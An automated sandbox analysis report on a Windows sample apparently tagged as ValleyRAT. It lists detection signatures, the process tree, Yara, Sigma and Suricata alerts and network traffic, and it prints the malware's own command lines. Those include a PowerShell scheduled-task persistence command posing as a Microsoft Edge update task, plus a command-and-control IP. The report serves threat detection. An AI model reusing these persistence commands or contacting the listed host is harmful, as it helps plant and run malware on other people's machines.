Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
eXIHsSYhOX.exe

Overview

General Information

Sample name:eXIHsSYhOX.exe
renamed because original name is a hash value
Original sample name:9170086e8d746e094ab4fe7444613030.exe
Analysis ID:1583995
MD5:9170086e8d746e094ab4fe7444613030
SHA1:b8afef741c151864c6bffc41a82824e0f51c0b97
SHA256:982c53771e2f23b29141062b5e2a90bf1588ce4a2dbb559031e7758bd192c8eb
Tags:exeValleyRATuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Contains functionality to inject code into remote processes
Loading BitLocker PowerShell Module
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
Uses Register-ScheduledTask to add task schedules
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • eXIHsSYhOX.exe (PID: 7776 cmdline: "C:\Users\user\Desktop\eXIHsSYhOX.exe" MD5: 9170086E8D746E094AB4FE7444613030)
    • eXIHsSYhOX.tmp (PID: 7792 cmdline: "C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp" /SL5="$2048C,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe" MD5: E97363B64F37EE24CDD55CEA14D1C564)
      • cmd.exe (PID: 7824 cmdline: "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 7876 cmdline: timeout /T 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • eXIHsSYhOX.exe (PID: 7948 cmdline: "C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: 9170086E8D746E094AB4FE7444613030)
          • eXIHsSYhOX.tmp (PID: 7968 cmdline: "C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp" /SL5="$304E8,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: E97363B64F37EE24CDD55CEA14D1C564)
            • regsvr32.exe (PID: 7988 cmdline: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • powershell.exe (PID: 8120 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 7380 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • regsvr32.exe (PID: 3128 cmdline: C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 4900 cmdline: /S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • powershell.exe (PID: 7436 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2917895885.000000000429F000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x2e0:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x3816:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x1cb50:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x20086:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Unpacked PEs

SourceRuleDescriptionAuthorStrings
7.2.regsvr32.exe.4f812d5.1.raw.unpackWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x1b87b:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x1edb1:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Source: Process startedAuthor: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll", ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7988, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", ProcessId: 8120, ProcessName: powershell.exe
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 103.97.176.69, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 7988, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll", CommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp" /SL5="$304E8,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES, ParentImage: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp, ParentProcessId: 7968, ParentProcessName: eXIHsSYhOX.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll", ProcessId: 7988, ProcessName: regsvr32.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll", ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7988, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", ProcessId: 8120, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

barindex
Sigma detected: Powershell launch regsvr32
Source: Process startedAuthor: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll", ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7988, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }", ProcessId: 8120, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-04T01:22:28.745998+010020528751A Network Trojan was detected192.168.2.449736103.97.176.69443TCP
2025-01-04T01:23:33.528707+010020528751A Network Trojan was detected192.168.2.453307103.97.176.69443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\BurlySparrow.dll (copy)ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\is-SF7GG.tmpReversingLabs: Detection: 65%
Multi AV Scanner detection for submitted file
Source: eXIHsSYhOX.exeVirustotal: Detection: 52%Perma Link
Source: eXIHsSYhOX.exeReversingLabs: Detection: 44%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8ADE90 BCryptGenRandom,SystemFunction036,7_2_6C8ADE90
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C8ADE90 BCryptGenRandom,SystemFunction036,14_2_6C8ADE90
Source: eXIHsSYhOX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\File_is1Jump to behavior
Source: eXIHsSYhOX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C870400 NetUserEnum,NetUserGetInfo,memcpy,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,LsaEnumerateLogonSessions,LsaFreeReturnBuffer,LsaGetLogonSessionData,memcmp,LsaFreeReturnBuffer,LsaFreeReturnBuffer,LsaFreeReturnBuffer,NetApiBufferFree,NetApiBufferFree,7_2_6C870400
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_6C870400 NetUserEnum,NetUserGetInfo,memcpy,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,LsaEnumerateLogonSessions,LsaFreeReturnBuffer,LsaGetLogonSessionData,memcmp,LsaFreeReturnBuffer,LsaFreeReturnBuffer,LsaFreeReturnBuffer,NetApiBufferFree,NetApiBufferFree,14_2_6C870400
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4x nop then push ebp7_2_6C85C720
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4x nop then push ebp14_2_6C85C720

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49736 -> 103.97.176.69:443
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:53307 -> 103.97.176.69:443
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 103.97.176.69 443Jump to behavior
Source: global trafficTCP traffic: 192.168.2.4:53046 -> 162.159.36.2:53
Source: Joe Sandbox ViewASN Name: ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK
Source: unknownDNS traffic detected: query: 18.31.95.13.in-addr.arpa replaycode: Name error (3)
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: unknownTCP traffic detected without corresponding DNS query: 103.97.176.69
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_02632FB0 select,recv,7_2_02632FB0
Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: powershell.exe, 0000000A.00000002.1868255401.0000000006C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1978277897.0000000003387000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: regsvr32.exe, 00000007.00000003.1775901750.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889000583.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1759503664.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1756577607.0000000004189000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774948229.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917563598.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1888311741.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758105092.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1750414268.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1772234354.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1751777281.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758205297.000000000418C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774741083.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1749875575.0000000004191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micro
Source: regsvr32.exe, 00000007.00000003.1775901750.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889000583.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1759503664.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1756577607.0000000004189000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774948229.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917563598.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1888311741.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758105092.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1750414268.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1772234354.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1751777281.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758205297.000000000418C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774741083.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1749875575.0000000004191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000008.00000002.1818056644.0000000005DED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1862302004.00000000050BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1809903757.0000000004ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004184000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000008.00000002.1809903757.0000000004D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.00000000051D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1809903757.0000000004ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004184000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1809903757.0000000004D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.00000000051D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: regsvr32.exe, regsvr32.exe, 0000000E.00000002.2029086598.000000006C955000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: eXIHsSYhOX.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: powershell.exe, 00000008.00000002.1818056644.0000000005DED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1862302004.00000000050BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: eXIHsSYhOX.exe, 00000000.00000003.1660219416.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.exe, 00000000.00000003.1660568722.000000007F0BB000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.tmp, 00000001.00000000.1662025483.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, eXIHsSYhOX.tmp, 00000006.00000000.1692249801.0000000000DDD000.00000020.00000001.01000000.00000006.sdmp, eXIHsSYhOX.tmp.0.drString found in binary or memory: https://www.innosetup.com/
Source: eXIHsSYhOX.exe, 00000000.00000003.1660219416.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.exe, 00000000.00000003.1660568722.000000007F0BB000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.tmp, 00000001.00000000.1662025483.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, eXIHsSYhOX.tmp, 00000006.00000000.1692249801.0000000000DDD000.00000020.00000001.01000000.00000006.sdmp, eXIHsSYhOX.tmp.0.drString found in binary or memory: https://www.remobjects.com/ps
Source: unknownNetwork traffic detected: HTTP traffic on port 53050 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53209
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53307
Source: unknownNetwork traffic detected: HTTP traffic on port 53056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53345
Source: unknownNetwork traffic detected: HTTP traffic on port 53054 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53349
Source: unknownNetwork traffic detected: HTTP traffic on port 53276 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53347
Source: unknownNetwork traffic detected: HTTP traffic on port 53142 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53050
Source: unknownNetwork traffic detected: HTTP traffic on port 53060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53351
Source: unknownNetwork traffic detected: HTTP traffic on port 53307 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 53347 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53110 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53242 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53349 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53345 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53078 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53353 -> 443
